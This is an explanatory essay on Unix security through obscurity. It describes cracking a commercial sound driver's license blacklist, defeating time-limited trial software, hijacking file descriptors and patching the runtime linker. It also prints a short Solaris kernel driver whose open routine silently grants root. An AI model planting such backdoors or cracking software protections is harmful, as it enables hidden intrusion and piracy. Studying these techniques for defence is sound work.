Security, Trust and Obscurity: A Tale of Few Bytes
This document has been obsoleted by Un*x Mischiefs: The New Frontiers.
Introduction
In the short (temporally) history of Computing, the semantics of security and trust have changed, and keep changing. There was perhaps a time when wizards were wizards and programming was black magic. Security through obscurity usually worked. In these volatile times, when the Open Source Movement is gaining strength each passing day, attempts at obscurity seem naïve and futile. We live in a progressively enlightened computing age - where lack of knowledge among the masses should not be taken for granted. For example, if I run an operating system installation like Linux, FreeBSD or some other "free" and/or open source system, or even something like Solaris, I would not be complacent enough to believe that the only tricks miscreants (a.k.a. crackers) could play on my system is guessing (conventionally referred to as "breaking") passwords and planting trojans and setuid binaries. The tricks, traps and trojans of today are far more sophisticated - both in conception and in implementation. Breaking into a system and gaining privileges is one part of the story - modifying the system minimally to avoid detection and to maintain a stronghold on the system is another. It is this aspect that I primarily discuss in this document with some examples.
Naïvety Prevails ...
Naïvety is inherent in most of us. What would be naïve in the context of security? Well, a cracker using relatively non-technical methods such as social engineering to gain entry into a system may be considered naïve (although this has statistically proved to be an effective form of naïvety). Using rot13 to "protect" confidential data would be (hopefully) naïve. Planting a setuid root shell would be naïve by today's standards. The concept is fuzzy and quite subjective. In particular, attempts to be obscure in software are usually naïve (even though it is often extremely hard to visually decipher an IOCCC winning entry!) Let us consider a real life example.
Security in Obscurity?
4 Front Technologies is a US based company that develops Open Sound System , a set of device drivers that provide a uniform API for digital audio across major UNIX architectures. The first OSS driver was for Linux, where it continues to be popular. The OSS is commercial software (costing US $20 as of this writing), though there's a free download that has a limited activity period. When you buy a copy of the OSS, you get a license that allows you free upgrades for the next few years or so. As it happens on the big, bad Internet, somebody gave away his OSS license to a "friend", who gave it to his "friend", and so on. The OSS guys would have been understandably unhappy with this misuse. They came up with an obvious (but naïve) solution: embed a list of offending license numbers in the driver wrapper (a program that authenticates the license and activates the driver). This was possible because a list of such (misused) license numbers was being maintained. Thus, at runtime, the wrapper compares the license number against those in the list, and if there's a match, it refuses to activate the driver. It is important to understand that it is not possible to modify the license file (change the number, for example) because of its design. It is quite simple to do a string search on the wrapper binary and locate the string of interest - which can be conveniently modified using GNU Emacs (or some hex editor). What we see here is a common misconception, that there's security in obscurity. Apparently the OSS guys figured out that this was too simple and ineffective a fix, and so they came up with a marginally lesser naïve solution: do not maintain the black-list as strings - keep the license numbers as raw data instead. Unfortunately, the enterprising would now just have to do something like an "od -x" (or functionally equivalent) on the binary, and search for their number (taking endian-ness into account). This could result in several matches, but that's not really a problem because:
- one could try to modify all matches, one at a time, and see if it works
- since in the new scheme, all black-listed numbers are still together, one could try a longer match
We see a related misconception here: there's security in raw (binary) data. This belief is not without reason: raw data is obscure to many people - at least to the extent that most people would not bother to decipher binary data (which may require endian-ness to be taken care of).
What next? Even if really smart logic is put in the wrapper, it must use a conditional branch (like the je, jne, be, bne instructions on the x86) at the point where it decides whether the license number is black-listed or not. With some enterprise, some educated and technically guided guesswork, it should be possible to logically negate the conditional jump (replace jne by je, for example), and see if it still complains.
Finally, to their credit, the OSS guys overhauled their licensing schema, that possibly required people to download a new license.
Reverse engineering is legally illegal, so using OSS the above way must be illegal (of course, there's an illegal license in the picture). It would still be illegal if there were no license involved but only a modification to the software to make it work without buying it. It is also shown that the worth of $20 in bytes is 4 in this case.
Crippled Software
Often we come across software versions that are crippled (because they are try-out versions, or "lite" versions, etc). Consider a streaming media player - it might be that a crippled version of it does not allow saving/recording of the audio stream being played (this feature may be present in the commercial version only). For the technically oriented, it is not too hard to arrange for a copy of the audio data to be saved as it is written to the audio hardware.
Consider software that is time-crippled: it would run only for a stipulated time, after which you are expected to purchase the retail version. Those who are bent upon making the expired software work resort to tricks like changing the system date, which usually has a hampering effect on certain aspects of the system (the file-system may not like it!). With kernel source at hand, it is possible to modify time related system calls (or corresponding library stubs) so that they report time on a per-file basis - simply report a historical time to the expired software, and the actual time to the rest of the system. Every system call could be potentially modified this way. What happens to the integrity of the operating system is debatable. Actually there's a relatively constructive way to look at this concept: why not have a neat framework in which it is possible to dynamically change the system call vector? A flexible user-interface and programming API allow the privileged user to (re)route system calls to alternate implementations - maybe on a per-file basis. The concept has interesting applications: assume that you would like to keep a file /etc/secrets on your system, but you want that the file should not be accessible no matter who's trying to open it (even if it is "root" herself). You could instruct the above framework to make the open system call fail for /etc/secrets. What's more, if this framework is toggleable (it can be switched on and off), the toggling could be passworded (with the password encrypted and stored in kernel memory) . You could block reboot if you want to.
If you would like to take a look at the prototype of such a system call trailing, blocking and re-routing system, take a look at the AUDIT framework I implemented. It is a loadable module only implementation for Linux.
Downloading code into the kernel
These days trojans are often planted within the kernel - these trojans are planted by serious and technically fluent hackers, who can be really creative. Let us conceptualize a loadable module in Solaris that would be the equivalent of a setuid root binary, but much less likely to be detected by system administrators, at least naïve ones. The module implements a device driver for a pseudo device
foo, say. The driver source is compiled, and the binary is placed in
/kernel/drv. add_drv(1M) is used to add the driver to the system, which will create a pseudo device file in /devices/pseudo. The interesting part of the code, which would compile to a couple of kilobytes or so, looks like the following:
static int
foo_open(dev_t *dev, int openflags, int otyp, cred_t *foo)
{
int retval = 0;
/* use ddi_get_soft_state() or something */
foo->cr_uid = 0;
foo->cr_gid = 0;
foo->cr_ruid = 0;
foo->cr_rgid = 0;
foo->cr_suid = 0;
foo->cr_sgid = 0;
return (retval);
}
As is evident, whosoever does an open on the device (cat /devices/pseudo/foo-whatever) gets his credential structure (sys/cred.h) modified as shown above , with his (rs)[ug]id set to 0.
Killing and Hijacking File Descriptors
This is a creatively destructive prank that some hacker could play on a system he has compromised. The idea is to take over an open file descriptor belonging to some other process. For example, an active telnet session would have a descriptor open for the socket. In a few lines of code, it would be possible to write a program (a loadable kernel module, or a user application that writes to kernel memory) that for a given pid, hijacks a given descriptor - either by dup()ing it for the hijacker and closing the original, or by swapping it with a dummy descriptor belonging to the hijacker. The original guy gets his connection terminated (which would not look too abnormal), and the hijacker gets the victim's connection. As is evident, weird tricks are possible when people can understand and modify the kernel.
Modify the runtime linker
Dynamic applications consist of one or more dynamic objects. ld.so.1 is the interpreter (runtime linker) that resolves the shared object dependencies of the application. As is pretty well known by now, the LD_PRELOAD variable lets you specify additional shared objects that are to be linked after the program is executed but before any other shared objects that the program references. This, apparently, is a user-level way of re-routing function and system calls (stubs). Obviously, this feature is not applicable to setuid objects, otherwise any user could have an open() implementation that does an exec("/bin/sh"), and use that while running a setuid binary (like ping). On Solaris, using the dis utility to disassemble ld.so.1 and examining it quickly reveals the location of the code that checks whether the file is setuid or not (the S_ISXXX family of masks, S_ISUID in particular) - a couple of bytes is all it takes to disable this check - change the machine instructions in-place, and the new ld.so.1 allows LD_PRELOAD for all binaries, setuid or not.
Reflections on Trusting Trust
...
Update
This article is incomplete. Please see Un*x Mischiefs: The New Frontiers.